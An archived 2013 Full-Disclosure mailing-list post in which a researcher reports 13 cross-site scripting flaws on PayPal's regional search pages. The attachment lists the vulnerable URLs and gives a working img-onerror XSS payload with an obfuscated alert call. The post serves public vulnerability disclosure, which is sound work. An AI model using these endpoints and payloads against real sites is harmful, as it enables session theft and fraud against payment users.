[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] 13 more XSS on Paypal
From: John Parker <unownsec () gmail ! com>
Date: 2013-05-28 7:40:28
Message-ID: CAPDA3VQF+wFHsi68-MEYG6PhKBJV-59908vaOvRpozOakA07uw () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
Dear Sir,
I recently found out 13 more XSS vulnerabilities and Paypal shows no
response. I am not a bad guy. But please make them aware about this issue
before any skid play with this.
Regards,
Un0wn_X
[Attachment #5 (text/html)]
<div dir="ltr">Dear Sir, <div><br></div><div style>I recently found out 13 more XSS \
vulnerabilities and Paypal shows no response. I am not a bad guy. But please make them aware \
about this issue before any skid play with this.</div> <div style><br></div><div \
style>Regards,</div><div style>Un0wn_X</div></div>
--089e0117692d29aa0604ddc236c7--
["pay.txt" (text/plain)]
Hello I saw about the paypal XSS vulnerability and I researched more and more. I found out that \
13 more countries are affected with this xss attack.
https://www.paypal.com/ch/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/nl/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/be/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/jp/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/cn/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/fr/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ca/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/es/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/uk/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/pl/cgi-bin/webscr?cmd=_sitewide-search
XSS Payload: <img src="x:gif" onerror="window['al\u0065rt'](/XSS by Un0wn_X/)"></img>
Image: http://www.anony.ws/i/2013/05/26/NTuWS.png
I reported them and I did not get any reply. Please make them aware about this vulnerability. I \
am giving this is out for the awareness
Researcher: Un0wn_X
Email: unonwsec@gmail.com
Follow @UnownSec
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic